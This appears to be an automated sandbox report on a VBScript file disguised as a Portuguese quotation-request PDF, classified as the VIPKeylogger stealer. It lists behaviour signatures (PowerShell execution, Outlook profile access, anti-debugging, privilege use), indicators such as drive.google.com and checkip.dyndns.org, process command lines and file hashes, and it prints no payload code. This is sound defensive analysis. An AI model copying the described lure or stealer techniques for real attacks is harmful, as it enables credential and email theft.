Malware Analysis Report

2024-11-30 15:00

Sample ID 241030-g5g2yayamb
Target Pedido de Cotação -RFQ20241029_Pdf.vbs
SHA256 bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3
Tags
discovery execution vipkeylogger collection keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bccb0ccb0f6f7ed80d4f2a27053febad9fbf4aa00ce438cf52b629cd12d1e0d3

Threat Level: Known bad

The file Pedido de Cotação -RFQ20241029_Pdf.vbs was found to be: Known bad.

Malicious Activity Summary

discovery execution vipkeylogger collection keylogger stealer

VIPKeylogger

Vipkeylogger family

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Network Service Discovery

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

outlook_office_path

outlook_win_path

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-30 06:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:25

Platform

win7-20241010-en

Max time kernel

150s

Max time network

19s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-30 06:23

Reported

2024-10-30 06:26

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

155s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241029_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpvych5n.1ms.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

C:\Users\Admin\AppData\Roaming\Databaands.Cag

MD5 f6579ea1ab825b27780f29716bf33381
SHA1 2f4b5633c9540b3010c53fc058efc3d6d77642f3
SHA256 88ae5c99126911132ed637b343c055ff1be103986116f998ef7247a573e2d823
SHA512 2977eacd74cfb217d8ec3ea87441a8211b7ffa2103e083b3e690fc9604615929159aad52fd2f2c35b53a3656298c8b2c0c08e51d5953f9c8f2ebc472b30a4e67
